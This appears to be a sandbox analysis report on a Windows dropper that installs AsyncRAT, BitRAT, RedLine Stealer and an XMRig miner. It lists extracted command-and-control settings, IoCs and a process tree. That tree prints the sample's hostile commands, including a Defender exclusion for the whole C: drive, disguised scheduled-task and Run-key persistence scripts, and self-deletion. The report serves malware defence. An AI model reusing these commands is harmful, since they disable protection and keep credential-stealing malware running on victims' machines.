asyncrat | c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2022 11:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe
Size

1.8MB
MD5

a3c4421d29cea8fcfe8cc98b25383613
SHA1

40105d16d55990ee9e0045b1c9d5433bd258e6f4
SHA256

c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0
SHA512

be98687a3fcb4c790e0b167ae3ca8788d1fbf436e9e31006bed93ee6a65d26fb32e60282cdd3c410dfdd84ef48cf441b2deddf12f324da4e81f72e22bdfb1d1b
SSDEEP

49152:x0OB/3tMBrb/TMvO90d7HjmAFd4A64nsfJ4y8gXG/jpCetBz1:V3a67

Score

10^/10

asyncrat bitrat redline xenarmor xmrig cheat new collection discovery infostealer miner password persistence rat recovery spyware stealer trojan upx

Malware Config

Extracted

Family

asyncrat

Version

1.0.7 - modded by last

Botnet

New

nicehash.at:4343

Mutex

adsasutex_qwqdanchun

Attributes

delay
1
install
true
install_file
GoogleDriver.exe
install_folder
%AppData%

aes.plain

Extracted

Family

bitrat

Version

1.38

nicehash.at:6000

Attributes

communication_password
005f16f264f006578c55237781f36898
install_dir
JavaHelper
install_file
Java.exe
tor_process
tor

Extracted

Family

redline

Botnet

cheat

nicehash.at:1338

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0002000000022dfc-191.dat	family_redline
behavioral2/files/0x0002000000022dfc-193.dat	family_redline
behavioral2/memory/4468-195-0x0000000000E60000-0x0000000000E7E000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

description	pid	Process	procid_target
PID 3148 created 2724	3148	mina.exe	36
PID 3148 created 2724	3148	mina.exe	36
PID 3148 created 2724	3148	mina.exe	36
PID 3552 created 2724	3552	updater.exe	36
PID 3552 created 2724	3552	updater.exe	36
PID 4308 created 2724	4308	conhost.exe	36
PID 3552 created 2724	3552	updater.exe	36
PID 3552 created 2724	3552	updater.exe	36

XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
recovery password xenarmor
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0001000000022e27-223.dat	acprotect
behavioral2/files/0x0001000000022e27-224.dat	acprotect

Async RAT payload 5 IoCs

rat

resource	yara_rule
behavioral2/files/0x0006000000022df4-157.dat	asyncrat
behavioral2/files/0x0006000000022df4-158.dat	asyncrat
behavioral2/memory/2312-159-0x0000026D85EC0000-0x0000026D85ED6000-memory.dmp	asyncrat
behavioral2/files/0x0004000000022df5-169.dat	asyncrat
behavioral2/files/0x0004000000022df5-170.dat	asyncrat

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/3544-251-0x00007FF7181C0000-0x00007FF7189B4000-memory.dmp	xmrig
behavioral2/memory/3544-255-0x00007FF7181C0000-0x00007FF7189B4000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 8 IoCs

pid	Process
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
3700	GoogleDriver.exe
4504	bit.exe
4468	rdln.exe
3148	mina.exe
2160	Java.exe
384	Java.exe
3552	updater.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0003000000022df7-178.dat	upx
behavioral2/files/0x0003000000022df7-180.dat	upx
behavioral2/memory/4504-182-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/4504-186-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/2160-210-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/files/0x0003000000022df7-211.dat	upx
behavioral2/memory/2160-213-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2160-215-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2160-214-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2160-218-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/files/0x0003000000022df7-219.dat	upx
behavioral2/memory/2160-232-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/3544-251-0x00007FF7181C0000-0x00007FF7189B4000-memory.dmp	upx
behavioral2/memory/3544-255-0x00007FF7181C0000-0x00007FF7189B4000-memory.dmp	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	tqjuueenirlwdernaqmyllatmhrvdymx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	GoogleDriver.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	rdln.exe

Loads dropped DLL 1 IoCs

pid	Process
384	Java.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Java.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exe"	bit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exeĀ"	bit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exe䜀"	bit.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4504	bit.exe
4504	bit.exe
4504	bit.exe
4504	bit.exe
4504	bit.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4504 set thread context of 2160	4504	bit.exe	123
PID 2160 set thread context of 384	2160	Java.exe	124
PID 3552 set thread context of 4308	3552	updater.exe	139
PID 3552 set thread context of 3544	3552	updater.exe	143

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3316	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3964	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2796	powershell.exe
2796	powershell.exe
2240	powershell.exe
2240	powershell.exe
1844	powershell.exe
1844	powershell.exe
3492	powershell.exe
3492	powershell.exe
3004	powershell.exe
3004	powershell.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
2324	powershell.exe
2324	powershell.exe
3700	GoogleDriver.exe
2716	powershell.exe
2716	powershell.exe
3700	GoogleDriver.exe
4468	rdln.exe
4468	rdln.exe
384	Java.exe
384	Java.exe
3148	mina.exe
3148	mina.exe
1312	powershell.exe
1312	powershell.exe
3148	mina.exe
3148	mina.exe
3148	mina.exe
3148	mina.exe
2212	powershell.exe
2212	powershell.exe
3552	updater.exe
3552	updater.exe
3040	powershell.exe
3040	powershell.exe
3552	updater.exe
3552	updater.exe
4308	conhost.exe
4308	conhost.exe
3552	updater.exe
3552	updater.exe
3552	updater.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	3492	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe
Token: SeDebugPrivilege	3700	GoogleDriver.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeShutdownPrivilege	4504	bit.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	4468	rdln.exe
Token: SeDebugPrivilege	384	Java.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeIncreaseQuotaPrivilege	1312	powershell.exe
Token: SeSecurityPrivilege	1312	powershell.exe
Token: SeTakeOwnershipPrivilege	1312	powershell.exe
Token: SeLoadDriverPrivilege	1312	powershell.exe
Token: SeSystemProfilePrivilege	1312	powershell.exe
Token: SeSystemtimePrivilege	1312	powershell.exe
Token: SeProfSingleProcessPrivilege	1312	powershell.exe
Token: SeIncBasePriorityPrivilege	1312	powershell.exe
Token: SeCreatePagefilePrivilege	1312	powershell.exe
Token: SeBackupPrivilege	1312	powershell.exe
Token: SeRestorePrivilege	1312	powershell.exe
Token: SeShutdownPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeSystemEnvironmentPrivilege	1312	powershell.exe
Token: SeRemoteShutdownPrivilege	1312	powershell.exe
Token: SeUndockPrivilege	1312	powershell.exe
Token: SeManageVolumePrivilege	1312	powershell.exe
Token: 33	1312	powershell.exe
Token: 34	1312	powershell.exe
Token: 35	1312	powershell.exe
Token: 36	1312	powershell.exe
Token: SeIncreaseQuotaPrivilege	1312	powershell.exe
Token: SeSecurityPrivilege	1312	powershell.exe
Token: SeTakeOwnershipPrivilege	1312	powershell.exe
Token: SeLoadDriverPrivilege	1312	powershell.exe
Token: SeSystemProfilePrivilege	1312	powershell.exe
Token: SeSystemtimePrivilege	1312	powershell.exe
Token: SeProfSingleProcessPrivilege	1312	powershell.exe
Token: SeIncBasePriorityPrivilege	1312	powershell.exe
Token: SeCreatePagefilePrivilege	1312	powershell.exe
Token: SeBackupPrivilege	1312	powershell.exe
Token: SeRestorePrivilege	1312	powershell.exe
Token: SeShutdownPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeSystemEnvironmentPrivilege	1312	powershell.exe
Token: SeRemoteShutdownPrivilege	1312	powershell.exe
Token: SeUndockPrivilege	1312	powershell.exe
Token: SeManageVolumePrivilege	1312	powershell.exe
Token: 33	1312	powershell.exe
Token: 34	1312	powershell.exe
Token: 35	1312	powershell.exe
Token: 36	1312	powershell.exe
Token: SeIncreaseQuotaPrivilege	1312	powershell.exe
Token: SeSecurityPrivilege	1312	powershell.exe
Token: SeTakeOwnershipPrivilege	1312	powershell.exe
Token: SeLoadDriverPrivilege	1312	powershell.exe
Token: SeSystemProfilePrivilege	1312	powershell.exe
Token: SeSystemtimePrivilege	1312	powershell.exe
Token: SeProfSingleProcessPrivilege	1312	powershell.exe
Token: SeIncBasePriorityPrivilege	1312	powershell.exe
Token: SeCreatePagefilePrivilege	1312	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4504	bit.exe
4504	bit.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3360 wrote to memory of 2796	3360	c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe	81
PID 3360 wrote to memory of 2796	3360	c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe	81
PID 2796 wrote to memory of 4288	2796	powershell.exe	83
PID 2796 wrote to memory of 4288	2796	powershell.exe	83
PID 4288 wrote to memory of 2240	4288	cmd.exe	85
PID 4288 wrote to memory of 2240	4288	cmd.exe	85
PID 3360 wrote to memory of 1844	3360	c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe	86
PID 3360 wrote to memory of 1844	3360	c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe	86
PID 4288 wrote to memory of 4768	4288	cmd.exe	88
PID 4288 wrote to memory of 4768	4288	cmd.exe	88
PID 1844 wrote to memory of 1732	1844	powershell.exe	89
PID 1844 wrote to memory of 1732	1844	powershell.exe	89
PID 1732 wrote to memory of 3492	1732	cmd.exe	91
PID 1732 wrote to memory of 3492	1732	cmd.exe	91
PID 1732 wrote to memory of 260	1732	cmd.exe	92
PID 1732 wrote to memory of 260	1732	cmd.exe	92
PID 3360 wrote to memory of 3004	3360	c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe	93
PID 3360 wrote to memory of 3004	3360	c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe	93
PID 3004 wrote to memory of 4460	3004	powershell.exe	95
PID 3004 wrote to memory of 4460	3004	powershell.exe	95
PID 4460 wrote to memory of 2312	4460	cmd.exe	97
PID 4460 wrote to memory of 2312	4460	cmd.exe	97
PID 2312 wrote to memory of 1552	2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe	98
PID 2312 wrote to memory of 1552	2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe	98
PID 2312 wrote to memory of 1112	2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe	100
PID 2312 wrote to memory of 1112	2312	tqjuueenirlwdernaqmyllatmhrvdymx.exe	100
PID 1552 wrote to memory of 3316	1552	cmd.exe	102
PID 1552 wrote to memory of 3316	1552	cmd.exe	102
PID 1112 wrote to memory of 3964	1112	cmd.exe	103
PID 1112 wrote to memory of 3964	1112	cmd.exe	103
PID 1112 wrote to memory of 3700	1112	cmd.exe	104
PID 1112 wrote to memory of 3700	1112	cmd.exe	104
PID 3700 wrote to memory of 4108	3700	GoogleDriver.exe	106
PID 3700 wrote to memory of 4108	3700	GoogleDriver.exe	106
PID 4108 wrote to memory of 2324	4108	cmd.exe	108
PID 4108 wrote to memory of 2324	4108	cmd.exe	108
PID 2324 wrote to memory of 4504	2324	powershell.exe	109
PID 2324 wrote to memory of 4504	2324	powershell.exe	109
PID 2324 wrote to memory of 4504	2324	powershell.exe	109
PID 3700 wrote to memory of 1436	3700	GoogleDriver.exe	111
PID 3700 wrote to memory of 1436	3700	GoogleDriver.exe	111
PID 1436 wrote to memory of 2716	1436	cmd.exe	113
PID 1436 wrote to memory of 2716	1436	cmd.exe	113
PID 2716 wrote to memory of 4468	2716	powershell.exe	114
PID 2716 wrote to memory of 4468	2716	powershell.exe	114
PID 2716 wrote to memory of 4468	2716	powershell.exe	114
PID 4468 wrote to memory of 3148	4468	rdln.exe	122
PID 4468 wrote to memory of 3148	4468	rdln.exe	122
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 4504 wrote to memory of 2160	4504	bit.exe	123
PID 2160 wrote to memory of 384	2160	Java.exe	124
PID 2160 wrote to memory of 384	2160	Java.exe	124
PID 2160 wrote to memory of 384	2160	Java.exe	124
PID 2160 wrote to memory of 384	2160	Java.exe	124
PID 2160 wrote to memory of 384	2160	Java.exe	124
PID 2160 wrote to memory of 384	2160	Java.exe	124
PID 2160 wrote to memory of 384	2160	Java.exe	124
PID 2160 wrote to memory of 384	2160	Java.exe	124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2724
- C:\Users\Admin\AppData\Local\Temp\c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe
  "C:\Users\Admin\AppData\Local\Temp\c0bf6bfcde19ac2738ba721e9d293961bea4881f624283de876aa919eb5c0df0.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Start-Process cmd \"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2796
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
    - - C:\Windows\system32\fsutil.exe
        
        fsutil file createnew C:\Users\Admin\AppData\Roaming\excluded.txt 1
        5⤵
        
        PID:4768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Start-Process cmd \"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1732
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
    - - C:\Windows\system32\fsutil.exe
        
        fsutil file createnew C:\Users\Admin\AppData\Roaming\excluded.txt 1
        5⤵
        
        PID:260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Start-Process cmd \"/k start %AppData%\tqjuueenirlwdernaqmyllatmhrvdymx.exe\" -WindowStyle hidden"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3004
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k start %AppData%\tqjuueenirlwdernaqmyllatmhrvdymx.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4460
    - - C:\Users\Admin\AppData\Roaming\tqjuueenirlwdernaqmyllatmhrvdymx.exe
        
        C:\Users\Admin\AppData\Roaming\tqjuueenirlwdernaqmyllatmhrvdymx.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"' & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1552
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:3316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp60B.tmp.bat""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1112
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:3964
        
        C:\Users\Admin\AppData\Roaming\GoogleDriver.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3700
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bit.exe"' & exit
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bit.exe"'
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\bit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bit.exe"
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\JavaHelper\Java.exe
        
        -a "C:\Users\Admin\AppData\Local\f7283604\plg\4jQ7JvnO.json"
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\JavaHelper\Java.exe
        
        -a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook accounts
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:384
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"' & exit
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"'
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\rdln.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rdln.exe"
        10⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\mina.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mina.exe"
        11⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1312
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\mina.exe"
  2⤵
  PID:1108
- - C:\Windows\System32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#pabzpsih#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2212
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:3800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3040
- C:\Windows\System32\cmd.exe
